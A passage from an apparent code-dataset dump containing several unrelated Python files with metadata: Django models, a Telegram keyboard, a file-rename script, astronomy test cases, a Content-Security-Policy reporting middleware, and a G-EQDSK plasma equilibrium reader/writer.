VERY_HARD = 5, "Very Hard"
NIGHTMARE = 6, "Nightmare"
difficult = models.PositiveSmallIntegerField(
'Difficult',
choices=Difficult.choices,
default=Difficult.MEDIUM
)
level_steps = models.IntegerField(default=10)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Module'
verbose_name_plural = 'Question Modules'
def __str__(self):
return self.title
class QuestionModuleStatistics(BaseModel):
module = models.ForeignKey(QuestionModule, on_delete=models.CASCADE, verbose_name='Module', related_name='statistics')
completed = models.BooleanField(blank=False, null=False, default=False)
max_step_reached = models.IntegerField(default=1)
value_generated = models.IntegerField(default=1)
trap_passed = models.BooleanField(blank=True, null=False, default=False)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Statistic'
verbose_name_plural = 'Question Statistics'
def __str__(self):
return self.module.title | none | 1 | 2.110477 | 2 | |
foodshare/keyboards/digit_list.py | Cocopyth/foodshare | 0 | 6613990 | <gh_stars>0
from telegram import InlineKeyboardButton
from foodshare.utils import emojize_number
digits_layout = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
digit_buttons = [
[
InlineKeyboardButton(emojize_number(x), callback_data=str(x))
for x in row
]
for row in digits_layout
]
| from telegram import InlineKeyboardButton
from foodshare.utils import emojize_number
digits_layout = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
digit_buttons = [
[
InlineKeyboardButton(emojize_number(x), callback_data=str(x))
for x in row
]
for row in digits_layout
] | none | 1 | 2.3679 | 2 | |
Ninja/rename_script.py | cyandterry/Python-Study | 61 | 6613991 | <gh_stars>10-100
#!/usr/bin/env python
import json
import glob
import os
from question_names import LARGE_JSON_STRING
"""
This is a script that I used to rename the filenames from no index to with index.
"""
if __name__ == '__main__':
leetcode_data = json.loads(LARGE_JSON_STRING)
questions = leetcode_data['stat_status_pairs']
name_to_num_dict = {}
for q in questions:
name_to_num_dict[q['stat']['question__title']] = q['stat']['question_id']
file_list = glob.glob('./Leetcode/*.py')
cannot_finish = []
for file in file_list:
filename = file.split('/')[-1].split('.')[0]
question_name = filename.replace('_', ' ')
if question_name in name_to_num_dict:
num = name_to_num_dict[question_name]
new_file_name = "./Leetcode/" + str(num) + '_' + filename + ".py"
# print(new_file_name)
# os.rename(file, new_file_name)
else:
cannot_finish.append(question_name)
print('*'*100)
print(cannot_finish)
| #!/usr/bin/env python
import json
import glob
import os
from question_names import LARGE_JSON_STRING
"""
This is a script that I used to rename the filenames from no index to with index.
"""
if __name__ == '__main__':
leetcode_data = json.loads(LARGE_JSON_STRING)
questions = leetcode_data['stat_status_pairs']
name_to_num_dict = {}
for q in questions:
name_to_num_dict[q['stat']['question__title']] = q['stat']['question_id']
file_list = glob.glob('./Leetcode/*.py')
cannot_finish = []
for file in file_list:
filename = file.split('/')[-1].split('.')[0]
question_name = filename.replace('_', ' ')
if question_name in name_to_num_dict:
num = name_to_num_dict[question_name]
new_file_name = "./Leetcode/" + str(num) + '_' + filename + ".py"
# print(new_file_name)
# os.rename(file, new_file_name)
else:
cannot_finish.append(question_name)
print('*'*100)
print(cannot_finish) | en | 0.819835 | #!/usr/bin/env python This is a script that I used to rename the filenames from no index to with index. # print(new_file_name) # os.rename(file, new_file_name) | 3.212963 | 3 |
jwql/tests/test_cosmic_ray_monitor.py | mengesser/jwql | 0 | 6613992 | <reponame>mengesser/jwql
#! /usr/bin/env python
"""Tests for the cosmic ray monitor module.
Authors
-------
- <NAME>
Use
---
These tests can be run via the command line (omit the ``-s`` to
suppress verbose output to stdout):
::
pytest -s test_cosmic_ray_monitor.py
"""
# Third Party Imports
from astropy.io import fits
import numpy as np
import pytest
# Local Imports
from cosmic_ray_monitor import Cosmic_Ray
from jwql.database.database_interface import MIRICosmicRayQueryHistory
def define_test_data(nints):
if nints == 1:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((10, 10))
else:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((2, 10, 10))
file = "jw00000000000_00000_00000_MIRIMAGE_uncal.fits"
aperture = "MIRIM_FULL"
return data, rate_data, file, aperture
def test_get_jump_data():
_ = define_test_data(2)
file = _[2]
head, data, dq = Cosmic_Ray.get_jump_data(file)
assert type(head) == fits.header.Header
assert type(data) == np.ndarray
assert type(dq) == np.ndarray
def test_get_rate_data():
_ = define_test_data(1)
file = _[2]
data = Cosmic_Ray.get_rate_data(file)
assert type(data) == np.ndarray
def test_get_cr_rate():
jump_locs = np.arange(100).tolist()
t = 5
rate = Cosmic_Ray.get_cr_rate(jump_locs, t)
assert rate == 20.0
def test_group_before():
jump_locs = [(2, 1, 1)]
nints = 1
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1)]
jump_locs = [(1, 2, 1, 1)]
nints = 2
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1, 1)]
def test_magnitude():
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
coord = (1, 2, 1, 1)
coord_gb = (1, 1, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
coord = (1, 1, 1)
coord_gb = (0, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
def test_get_cr_mags():
jump_locs = [(2, 1, 1)]
jump_locs_pre = [(1, 1, 1)]
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
jump_locs = [(1, 2, 1, 1)]
jump_locs_pre = [(1, 1, 1, 1)]
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
def test_most_recent_search():
_ = define_test_data(1)
aperture = _[3]
query_table = MIRICosmicRayQueryHistory
result = Cosmic_Ray.most_recent_search(aperture,query_table)
assert result == 57357.0
def test_query_mast():
start_date = 57357.0
end_date = 57405.0
result = Cosmic_Ray.query_mast(start_date, end_date)
assert len(result) == 5
| #! /usr/bin/env python
"""Tests for the cosmic ray monitor module.
Authors
-------
- <NAME>
Use
---
These tests can be run via the command line (omit the ``-s`` to
suppress verbose output to stdout):
::
pytest -s test_cosmic_ray_monitor.py
"""
# Third Party Imports
from astropy.io import fits
import numpy as np
import pytest
# Local Imports
from cosmic_ray_monitor import Cosmic_Ray
from jwql.database.database_interface import MIRICosmicRayQueryHistory
def define_test_data(nints):
if nints == 1:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((10, 10))
else:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((2, 10, 10))
file = "jw00000000000_00000_00000_MIRIMAGE_uncal.fits"
aperture = "MIRIM_FULL"
return data, rate_data, file, aperture
def test_get_jump_data():
_ = define_test_data(2)
file = _[2]
head, data, dq = Cosmic_Ray.get_jump_data(file)
assert type(head) == fits.header.Header
assert type(data) == np.ndarray
assert type(dq) == np.ndarray
def test_get_rate_data():
_ = define_test_data(1)
file = _[2]
data = Cosmic_Ray.get_rate_data(file)
assert type(data) == np.ndarray
def test_get_cr_rate():
jump_locs = np.arange(100).tolist()
t = 5
rate = Cosmic_Ray.get_cr_rate(jump_locs, t)
assert rate == 20.0
def test_group_before():
jump_locs = [(2, 1, 1)]
nints = 1
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1)]
jump_locs = [(1, 2, 1, 1)]
nints = 2
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1, 1)]
def test_magnitude():
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
coord = (1, 2, 1, 1)
coord_gb = (1, 1, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
coord = (1, 1, 1)
coord_gb = (0, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
def test_get_cr_mags():
jump_locs = [(2, 1, 1)]
jump_locs_pre = [(1, 1, 1)]
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
jump_locs = [(1, 2, 1, 1)]
jump_locs_pre = [(1, 1, 1, 1)]
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
def test_most_recent_search():
_ = define_test_data(1)
aperture = _[3]
query_table = MIRICosmicRayQueryHistory
result = Cosmic_Ray.most_recent_search(aperture,query_table)
assert result == 57357.0
def test_query_mast():
start_date = 57357.0
end_date = 57405.0
result = Cosmic_Ray.query_mast(start_date, end_date)
assert len(result) == 5 | en | 0.539988 | #! /usr/bin/env python Tests for the cosmic ray monitor module. Authors ------- - <NAME> Use --- These tests can be run via the command line (omit the ``-s`` to suppress verbose output to stdout): :: pytest -s test_cosmic_ray_monitor.py # Third Party Imports # Local Imports | 2.32723 | 2 |
csp_observer/middleware.py | flxn/django-csp-observer | 1 | 6613993 | <filename>csp_observer/middleware.py
import re
import logging
import json
import base64
import uuid
import asyncio
import random
from django.urls import reverse
from . import settings as app_settings
from .models import Session
from django.template.loader import render_to_string
from django.templatetags.static import static
from .report_handlers import REPORT_TYPE_CSP, REPORT_TYPE_TRIPWIRE
from .remote import create_master_session
class CspReportMiddleware:
    """The main middleware that handles all of CSP-Observer's business logic.

    For every request whose path matches one of ``ENABLED_PATHS`` it:
      * creates an observation session (locally, or on a remote master
        collector when ``REMOTE_REPORTING`` is enabled),
      * attaches a Content-Security-Policy (or Report-Only) header whose
        violation reports are routed to that session,
      * injects the tripwire and client-UI javascript components into the
        HTML response,
      * optionally adds the CSP nonce to inline script/style/link tags.
    """

    def __init__(self, get_response):
        """Store the wrapped middleware chain and precompute static state.

        :param get_response: the next callable in Django's middleware chain
        """
        self.super_get_response = get_response
        self.logger = logging.getLogger(__name__)
        self.reporting_group_name = "csp-observer"
        self.csp_header_name = "Content-Security-Policy"
        if app_settings.REPORT_ONLY:
            # report-only mode: violations are reported but not enforced
            self.csp_header_name = "Content-Security-Policy-Report-Only"
        # compile regexes for all enabled paths once, at startup
        self.paths_regex = [re.compile("^{}$".format(p)) for p in app_settings.ENABLED_PATHS]
        # generate a random lower-case string used as the CSP nonce
        # NOTE(review): the nonce is created once per middleware instance and
        # is therefore shared by every request this process serves. CSP nonces
        # are only effective when unique per response -- consider generating a
        # fresh nonce per request. TODO confirm and fix.
        self.nonce = "".join(chr(random.randint(97, 122)) for _ in range(10))
        # serialized Report-To header value; filled in by get_csp_policy()
        # when USE_NEW_API is enabled and emitted by add_csp_header()
        self.report_to_header = None

    def get_response(self, request):
        """Run the wrapped chain; master collectors also get CORS headers added."""
        response = self.super_get_response(request)
        if app_settings.IS_MASTER_COLLECTOR:
            response = self.add_cors_header(request, response)
        return response

    def anonymize_ip(self, ip_address):
        """Removes the last two octets from the ip_address.

        Keeps the first two dotted groups and replaces the rest with ``0.0``
        (IPv4 only -- presumably callers never pass IPv6; verify upstream).
        """
        return ".".join(ip_address.split(".")[:2] + 2*["0"])

    def create_session(self, request):
        """Creates a new session object, stores it in the database and returns the session id.

        Only the user agent and an anonymized client IP are persisted.
        """
        session = Session(
            user_agent=request.META["HTTP_USER_AGENT"],
            anonymized_ip=self.anonymize_ip(request.META["REMOTE_ADDR"])
        )
        session.save()
        self.logger.debug("session created: {}".format(session.id))
        return session.id

    def get_csp_policy(self, request, session_id):
        """Returns the CSP policy string based on the current settings.

        The policy always contains a ``report-uri`` directive pointing at the
        report endpoint for *session_id* plus nonce sources for the shared
        middleware nonce; custom directives from ``CSP_POLICIES`` are merged
        in without overriding the mandatory reporting directive.
        """
        if app_settings.REMOTE_REPORTING:
            report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_CSP, session_id)
        else:
            report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_CSP, session_id, )))
        # set fallback reporting directive and allow the injected nonce
        middleware_directives = {
            'report-uri': [report_uri],
            'script-src': ["'nonce-{}'".format(self.nonce)],
            'style-src': ["'nonce-{}'".format(self.nonce)],
            'default-src': ["'nonce-{}'".format(self.nonce)],
        }
        if app_settings.REMOTE_REPORTING:
            # the tripwire/client-ui scripts must be allowed to contact the
            # remote collector
            middleware_directives['connect-src'] = [app_settings.REMOTE_CSP_OBSERVER_URL + "/"]
        if app_settings.USE_NEW_API:
            # New Reporting API (https://w3c.github.io/reporting/): advertise
            # a named reporting group. The Report-To header itself is emitted
            # by add_csp_header(), which has access to the response object --
            # the previous code referenced an undefined ``response`` variable
            # here and raised a NameError whenever USE_NEW_API was enabled.
            report_to_group_definition = {
                "group": self.reporting_group_name,
                "max_age": 86400,
                "include_subdomains": True,
                "endpoints": [{
                    "url": report_uri,
                }]
            }
            middleware_directives['report-to'] = [self.reporting_group_name]
            self.report_to_header = json.dumps(report_to_group_definition)
        # merge the custom csp policy from the settings with the required
        # middleware directives; copy first so the module-level CSP_POLICIES
        # dict is never mutated across requests (the old code aliased it and
        # accumulated middleware directives into the settings object)
        final_csp_policy = dict(app_settings.CSP_POLICIES)
        for directive, values in middleware_directives.items():
            if directive in final_csp_policy and directive != 'report-uri':
                final_csp_policy[directive] = set(list(final_csp_policy[directive]) + list(values))
            else:
                final_csp_policy[directive] = values
        # build csp header string: "directive v1 v2; directive v1; ..."
        csp_policy_string = ""
        for directive, values in final_csp_policy.items():
            csp_policy_string += "{} {}; ".format(directive, " ".join(values))
        return csp_policy_string

    def add_csp_header(self, request, response, session_id):
        """Adds the CSP header (and Report-To header, if enabled) to the response."""
        policy = self.get_csp_policy(request, session_id)
        response[self.csp_header_name] = policy
        if self.report_to_header is not None:
            # populated by get_csp_policy() when USE_NEW_API is enabled
            response["Report-To"] = self.report_to_header
        return response

    def add_cors_header(self, request, response):
        """Adds the CORS headers required for master reporting instances.

        Appends the authorized reporter origins to any pre-existing
        Access-Control-Allow-Origin value and mirrors requested headers.
        """
        origins = ' '.join(app_settings.AUTHORIZED_REPORTERS)
        if 'Access-Control-Allow-Origin' in response:
            origins = response['Access-Control-Allow-Origin'] + ' ' + origins
        response['Access-Control-Allow-Origin'] = origins
        if 'Access-Control-Request-Headers' in request.headers:
            response['Access-Control-Allow-Headers'] = request.headers['Access-Control-Request-Headers']
        return response

    def add_tripwire(self, request, response, session_id):
        """Injects the tripwire javascript component into HTML response.

        The script tag carries the session id, the base64-encoded CSP policy
        and the report endpoint as data attributes. NOTE: the replacement
        assumes a non-streaming HTML response containing ``</body>``.
        """
        tripwire_js_path = static('csp_observer/js/tripwire.js')
        tripwire_js_uri = request.build_absolute_uri(tripwire_js_path)
        policy = self.get_csp_policy(request, session_id)
        policy_b64 = base64.b64encode(str.encode(policy)).decode()
        if app_settings.REMOTE_REPORTING:
            tripwire_report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_TRIPWIRE, session_id)
        else:
            tripwire_report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_TRIPWIRE, session_id, )))
        script_tag_string = '<script type="text/javascript" data-session="{}" data-policy="{}" data-report-uri="{}" src="{}"></script>'.format(
            session_id,
            policy_b64,
            tripwire_report_uri,
            tripwire_js_uri
        )
        response.content = response.content.replace(b'</body>', str.encode(script_tag_string + '</body>'))
        return response

    def add_script_nonce(self, request, response):
        """Injects nonce attribute into all script tags in HTML response."""
        nonce_script_tag = '<script nonce="{}"'.format(self.nonce)
        response.content = response.content.replace(b'<script', str.encode(nonce_script_tag))
        return response

    def add_style_nonce(self, request, response):
        """Injects nonce attribute into all style and link tags in HTML response."""
        nonce_style_tag = '<style nonce="{}"'.format(self.nonce)
        response.content = response.content.replace(b'<style', str.encode(nonce_style_tag))
        nonce_link_tag = '<link nonce="{}"'.format(self.nonce)
        response.content = response.content.replace(b'<link', str.encode(nonce_link_tag))
        return response

    def add_clientui(self, request, response, session_id):
        """Injects the clientui javascript component, responsible for the popup dialog, into HTML response."""
        if app_settings.REMOTE_REPORTING:
            result_uri = "{}/result/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
            detailpage_uri = "{}/resultdetail/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
        else:
            result_uri = request.build_absolute_uri(reverse('result', args=(session_id, )))
            detailpage_uri = request.build_absolute_uri(reverse('result_detail', args=(session_id, )))
        clientui_html = render_to_string("client_ui/popup.html", {
            'session_id': session_id,
            'visibility': app_settings.CLIENTUI_VISIBILITY,
            'result_uri': result_uri,
            'detailpage_uri': detailpage_uri
        })
        response.content = response.content.replace(b'</body>', str.encode(clientui_html + '</body>'))
        return response

    def __call__(self, request):
        """Checks current request path to decide if it should be observed or not.

        Matching requests get a session, the CSP header and the injected
        javascript components; everything else passes through untouched.
        """
        # check if path in enabled paths
        for path_regex in self.paths_regex:
            if path_regex.match(request.path):
                self.logger.debug("match for path {}".format(request.path))
                if app_settings.REMOTE_REPORTING:
                    session_id = str(uuid.uuid4())
                    self.logger.debug("creating remote session {}".format(session_id))
                    asyncio.run(create_master_session(request, session_id))
                else:
                    session_id = self.create_session(request)
                # expose the session id to downstream views/templates
                request.cspo_session_id = session_id
                response = self.get_response(request)
                response = self.add_csp_header(request, response, session_id)
                response = self.add_tripwire(request, response, session_id)
                response = self.add_clientui(request, response, session_id)
                if app_settings.USE_SCRIPT_NONCE:
                    response = self.add_script_nonce(request, response)
                if app_settings.USE_STYLE_NONCE:
                    response = self.add_style_nonce(request, response)
                return response
        return self.get_response(request)
import re
import logging
import json
import base64
import uuid
import asyncio
import random
from django.urls import reverse
from . import settings as app_settings
from .models import Session
from django.template.loader import render_to_string
from django.templatetags.static import static
from .report_handlers import REPORT_TYPE_CSP, REPORT_TYPE_TRIPWIRE
from .remote import create_master_session
class CspReportMiddleware:
"""The main middleware that handles all of CSP-Observer's business logic."""
def __init__(self, get_response):
self.super_get_response = get_response
self.logger = logger = logging.getLogger(__name__)
self.reporting_group_name = "csp-observer"
self.csp_header_name = "Content-Security-Policy"
if app_settings.REPORT_ONLY:
self.csp_header_name = "Content-Security-Policy-Report-Only"
# compile regexes for all enabled paths
self.paths_regex = [re.compile("^{}$".format(p)) for p in app_settings.ENABLED_PATHS]
nonce_temp = ''
# generate random lower case string
for _ in range(10):
random_int = random.randint(97, 122)
nonce_temp += chr(random_int)
self.nonce = nonce_temp
def get_response(self, request):
response = self.super_get_response(request)
if app_settings.IS_MASTER_COLLECTOR:
response = self.add_cors_header(request, response)
return response
def anonymize_ip(self, ip_address):
"""Removes the last two octets from the ip_address."""
return ".".join(ip_address.split(".")[:2] + 2*["0"])
def create_session(self, request):
"""Creates a new session object, stores it in the database and returns the session id."""
session = Session(
user_agent=request.META["HTTP_USER_AGENT"],
anonymized_ip=self.anonymize_ip(request.META["REMOTE_ADDR"])
)
session.save()
self.logger.debug("session created: {}".format(session.id))
return session.id
def get_csp_policy(self, request, session_id):
"""Returns the CSP policy string based on the current settings."""
if app_settings.REMOTE_REPORTING:
report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_CSP, session_id)
else:
report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_CSP, session_id, )))
# set fallback reporting directive
middleware_directives = {
'report-uri': [report_uri],
'script-src': ["'nonce-{}'".format(self.nonce)],
'style-src': ["'nonce-{}'".format(self.nonce)],
'default-src': ["'nonce-{}'".format(self.nonce)],
}
if app_settings.REMOTE_REPORTING:
middleware_directives['connect-src'] = [app_settings.REMOTE_CSP_OBSERVER_URL + "/"]
# New Reporting API stuff (not working?!):
# https://w3c.github.io/reporting/
# response["Reporting-Endpoints"] = '{}="{}"'.format(self.reporting_group_name, report_uri)
report_to_group_definition = {
"group": self.reporting_group_name,
"max_age": 86400,
"include_subdomains": True,
"endpoints": [{
"url": report_uri,
}]
}
if app_settings.USE_NEW_API:
middleware_directives['report-to'] = [self.reporting_group_name]
response["Report-To"] = json.dumps(report_to_group_definition)
# merge custom csp policy from settings with required middleware directives
final_csp_policy = app_settings.CSP_POLICIES
for directive, values in middleware_directives.items():
if directive in final_csp_policy and directive != 'report-uri':
final_csp_policy[directive] = set(list(final_csp_policy[directive]) + list(values))
else:
final_csp_policy[directive] = values
# build csp header string
csp_policy_string = ""
for directive, values in final_csp_policy.items():
csp_policy_string += "{} {}; ".format(directive, " ".join(values))
return csp_policy_string
def add_csp_header(self, request, response, session_id):
"""Adds the CSP header to the response."""
policy = self.get_csp_policy(request, session_id)
response[self.csp_header_name] = policy
return response
def add_cors_header(self, request, response):
"""Adds the CORS headers required for master reporting instances."""
origins = ' '.join(app_settings.AUTHORIZED_REPORTERS)
if 'Access-Control-Allow-Origin' in response:
origins = response['Access-Control-Allow-Origin'] + ' ' + origins
response['Access-Control-Allow-Origin'] = origins
if 'Access-Control-Request-Headers' in request.headers:
response['Access-Control-Allow-Headers'] = request.headers['Access-Control-Request-Headers']
return response
def add_tripwire(self, request, response, session_id):
    """Inject the tripwire javascript component into an HTML response.

    The script tag carries the session id, the base64-encoded CSP policy
    and the report endpoint (remote observer when ``REMOTE_REPORTING`` is
    enabled, local ``report`` view otherwise) and is spliced in just
    before ``</body>``.
    """
    policy = self.get_csp_policy(request, session_id)
    encoded_policy = base64.b64encode(policy.encode()).decode()
    js_uri = request.build_absolute_uri(static('csp_observer/js/tripwire.js'))
    if app_settings.REMOTE_REPORTING:
        report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_TRIPWIRE, session_id)
    else:
        report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_TRIPWIRE, session_id, )))
    tag = '<script type="text/javascript" data-session="{}" data-policy="{}" data-report-uri="{}" src="{}"></script>'.format(
        session_id,
        encoded_policy,
        report_uri,
        js_uri
    )
    response.content = response.content.replace(b'</body>', (tag + '</body>').encode())
    return response
def add_script_nonce(self, request, response):
    """Stamp every ``<script`` opening tag in the response with this request's nonce."""
    stamped = '<script nonce="{}"'.format(self.nonce).encode()
    response.content = response.content.replace(b'<script', stamped)
    return response
def add_style_nonce(self, request, response):
    """Stamp every ``<style`` and ``<link`` opening tag with this request's nonce."""
    for tag in (b'<style', b'<link'):
        stamped = tag + ' nonce="{}"'.format(self.nonce).encode()
        response.content = response.content.replace(tag, stamped)
    return response
def add_clientui(self, request, response, session_id):
    """Inject the clientui javascript component (popup dialog) into an HTML response.

    The popup template receives the session id, the configured visibility
    and the result/detail URIs (remote observer endpoints when
    ``REMOTE_REPORTING`` is on, local views otherwise); the rendered
    markup is spliced in just before ``</body>``.
    """
    if app_settings.REMOTE_REPORTING:
        result_uri = "{}/result/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
        detailpage_uri = "{}/resultdetail/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
    else:
        result_uri = request.build_absolute_uri(reverse('result', args=(session_id, )))
        detailpage_uri = request.build_absolute_uri(reverse('result_detail', args=(session_id, )))
    markup = render_to_string("client_ui/popup.html", {
        'session_id': session_id,
        'visibility': app_settings.CLIENTUI_VISIBILITY,
        'result_uri': result_uri,
        'detailpage_uri': detailpage_uri,
    })
    response.content = response.content.replace(b'</body>', (markup + '</body>').encode())
    return response
def __call__(self, request):
    """Middleware entry point: observe the request if its path is enabled.

    For a path matching one of the configured regexes, a session is
    created (registered with the master instance when ``REMOTE_REPORTING``
    is on, otherwise stored locally), the CSP header is attached and the
    tripwire/clientui scripts plus optional nonces are injected into the
    response.  Non-matching paths pass through untouched.
    """
    # check if path in enabled paths
    for path_regex in self.paths_regex:
        if path_regex.match(request.path):
            self.logger.debug("match for path {}".format(request.path))
            if app_settings.REMOTE_REPORTING:
                # remote mode: generate the id locally, then register it
                # with the master observer instance
                session_id = str(uuid.uuid4())
                self.logger.debug("creating remote session {}".format(session_id))
                asyncio.run(create_master_session(request, session_id))
            else:
                session_id = self.create_session(request)
            request.cspo_session_id = session_id
            response = self.get_response(request)
            response = self.add_csp_header(request, response, session_id)
            response = self.add_tripwire(request, response, session_id)
            response = self.add_clientui(request, response, session_id)
            # nonce stamping runs after the injections, so the script tag
            # inserted by add_tripwire gets stamped as well
            if app_settings.USE_SCRIPT_NONCE:
                response = self.add_script_nonce(request, response)
            if app_settings.USE_STYLE_NONCE:
                response = self.add_style_nonce(request, response)
            return response
    return self.get_response(request)
python/spdm/plugins/data/file/PluginGEQdsk.py | simpla-fusion/spdb | 0 | 6613994 | <filename>python/spdm/plugins/data/file/PluginGEQdsk.py<gh_stars>0
import collections
import pathlib
import pprint
from functools import cached_property
import numpy as np
from spdm.common.logger import logger
from spdm.data.Node import Dict
from spdm.data.Entry import Entry, _next_
from spdm.data.File import File
def sp_read_geqdsk(file):
    """
    Parse a G-EQDSK equilibrium file.

    :param file: readable text file object positioned at the start of the data
    :return: dict with the header scalars, the 1D profiles (``fpol``,
             ``pres``, ``ffprim``, ``pprim``, ``qpsi``), the poloidal flux
             map ``psirz`` (shape ``[nh, nw]``) and — when the optional
             trailing section is present — the boundary ``bbsrz`` and
             limiter ``limrz`` contours as ``[n, 2]`` arrays (otherwise
             ``None``).
    """
    # Header record: 48-char description followed by three 4-char integers.
    description = file.read(48)
    idum = int(file.read(4))   # dummy integer mandated by the format; unused
    nw = int(file.read(4))     # number of horizontal (R) grid points
    nh = int(file.read(4))     # number of vertical (Z) grid points
    file.readline()
    # Four records of five 16-char floats each.  Several quantities
    # (simag, sibry, rmaxis, zmaxis) are stored twice by the format; the
    # repeated reads below just re-assign the same values.
    rdim = float(file.read(16))
    zdim = float(file.read(16))
    rcentr = float(file.read(16))
    rleft = float(file.read(16))
    zmid = float(file.read(16))
    file.readline()
    rmaxis = float(file.read(16))
    zmaxis = float(file.read(16))
    simag = float(file.read(16))
    sibry = float(file.read(16))
    bcentr = float(file.read(16))
    file.readline()
    current = float(file.read(16))
    simag = float(file.read(16))
    xdum = float(file.read(16))
    rmaxis = float(file.read(16))
    xdum = float(file.read(16))
    file.readline()
    zmaxis = float(file.read(16))
    xdum = float(file.read(16))
    sibry = float(file.read(16))
    xdum = float(file.read(16))
    xdum = float(file.read(16))
    file.readline()

    def _read_data(count, width=16):
        """Read *count* fixed-width floats laid out five per line."""
        data = []
        for n in range(count):
            data.append(float(file.read(width)))
            # a newline terminates every 5th value and the final one
            if n >= count - 1 or ((n + 1) % 5 == 0):
                file.readline()
        data = np.asarray(data)
        return data

    fpol = _read_data(nw)
    pres = _read_data(nw)
    ffprim = _read_data(nw)
    pprim = _read_data(nw)
    psirz = _read_data(nw * nh).reshape([nh, nw])
    qpsi = _read_data(nw)
    # The boundary/limiter section is optional; on a truncated or absent
    # section the int()/float() conversions fail with ValueError.  (This
    # was a bare ``except:`` before, which also swallowed
    # KeyboardInterrupt/SystemExit.)
    try:
        nbbs = int(file.read(5))
        limitr = int(file.read(5))
        file.readline()
        bbsrz = _read_data(nbbs * 2).reshape([nbbs, 2])
        limrz = _read_data(limitr * 2).reshape([limitr, 2])
    except ValueError:
        nbbs = 0
        limitr = 0
        bbsrz = None
        limrz = None
    data = {
        "description": description,
        "nw": nw,
        "nh": nh,
        "rdim": rdim,
        "zdim": zdim,
        "rcentr": rcentr,
        "rleft": rleft,
        "zmid": zmid,
        "rmaxis": rmaxis,
        "zmaxis": zmaxis,
        "simag": simag,
        "sibry": sibry,
        "bcentr": bcentr,
        "current": current,
        "fpol": fpol,
        "pres": pres,
        "ffprim": ffprim,
        "pprim": pprim,
        "psirz": psirz,
        "qpsi": qpsi,
        "bbsrz": bbsrz,
        "limrz": limrz,
    }
    return data
def sp_write_geqdsk(p, file):
    """
    Serialize a geqdsk-style profile dict *p* (as produced by
    ``sp_read_geqdsk`` / ``sp_imas_equilibrium_to_geqdsk``) to *file*.

    :param p: dict holding the header scalars, 1D profiles, the 2D flux
              map ``psirz`` and the ``bbsrz``/``limrz`` contour arrays
    :param file: writable text file object
    :return: None
    """
    nw = p["nw"]
    nh = p["nh"]

    def _write_data(values):
        """Write fixed-width floats, five per line, newline after the last."""
        total = len(values)
        for i, v in enumerate(values):
            file.write("%16.9e" % v)
            if i == total - 1 or (i + 1) % 5 == 0:
                file.write('\n')

    # header line: 48-char description plus three 4-char integers
    file.write("%48s%4i%4i%4i\n" % (p["description"], 3, p["nw"], p["nh"]))
    # four records of five scalars (the format repeats simag/rmaxis/etc.
    # and pads with zero dummies)
    header_rows = [
        (p["rdim"], p["zdim"], p["rcentr"], p["rleft"], p["zmid"]),
        (p["rmaxis"], p["zmaxis"], p["simag"], p["sibry"], p["bcentr"]),
        (p["current"], p["simag"], 0, p["rmaxis"], 0),
        (p["zmaxis"], 0, p["sibry"], 0, 0),
    ]
    for rowvals in header_rows:
        file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" % rowvals)
    for key in ("fpol", "pres", "ffprim", "pprim"):
        _write_data(p[key])
    _write_data(p["psirz"].reshape([nw * nh]))
    _write_data(p["qpsi"])
    # boundary/limiter section: point counts, then the flattened contours
    file.write("%5i%5i\n" % (p["bbsrz"].shape[0], p["limrz"].shape[0]))
    _write_data(p["bbsrz"].reshape([p["bbsrz"].size]))
